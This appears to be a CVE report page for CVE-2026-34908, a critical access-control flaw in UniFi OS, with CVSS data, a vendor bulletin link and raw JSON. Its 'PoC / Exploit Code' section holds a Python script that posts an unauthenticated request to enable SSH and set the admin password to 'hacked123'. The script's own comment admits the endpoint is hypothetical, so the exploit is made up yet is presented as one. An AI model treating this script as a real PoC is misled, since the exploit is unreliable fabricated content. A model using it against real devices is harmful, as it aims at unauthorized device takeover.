Security Vulnerability Report
CVE-2026-34908 CVSS 10.0 CRITICAL

CVE-2026-34908

Published: 2026-05-22 02:16:34
Last Modified: 2026-05-22 02:16:34

Description

A malicious actor with access to the network could exploit an Improper Access Control vulnerability found in UniFi OS devices to make unauthorized changes to the system.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

UniFi OS (for the specific affected versions, refer to the vendor's Security Advisory Bulletin 064-064)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import urllib3

# Target configuration
target_ip = "192.168.1.1"
target_port = "443"
base_url = f"https://{target_ip}:{target_port}"

# Vulnerable endpoint (hypothetical, based on the described access control issue; not a confirmed path)
vuln_endpoint = "/api/status/unauthorized"

# Headers to mimic a legitimate browser request
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Content-Type": "application/json",
    "Accept": "application/json",
}

# Payload to make unauthorized changes (Python booleans; the JSON literals true/false are not valid Python)
payload = {
    "authorized": False,
    "action": "modify_system_config",
    "new_config": {
        "ssh_enable": True,
        "admin_password": "hacked123",
    },
}

try:
    # Disable the SSL verification warning for demonstration
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    # Send the request without any authentication token
    response = requests.post(
        base_url + vuln_endpoint,
        json=payload,
        headers=headers,
        verify=False,
        timeout=10,
    )
    if response.status_code == 200:
        print("[+] Exploit successful! System configuration changed.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
        print(f"[-] Response: {response.text}")
except Exception as e:
    print(f"[!] Error occurred: {e}")
```

References

https://community.ui.com/releases/Security-Advisory-Bulletin-064-064/84811c09-4cf4-42ab-bd61-cc994445963b (Ubiquiti Security Advisory Bulletin 064-064)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-34908",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-22T02:16:34.240",
    "lastModified": "2026-05-22T02:16:34.240",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A malicious actor with access to the network could exploit an Improper Access Control vulnerability found in UniFi OS devices to make unauthorized changes to the system."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 10.0,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-284"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://community.ui.com/releases/Security-Advisory-Bulletin-064-064/84811c09-4cf4-42ab-bd61-cc994445963b",
        "source": "[email protected]"
      }
    ]
  }
}
```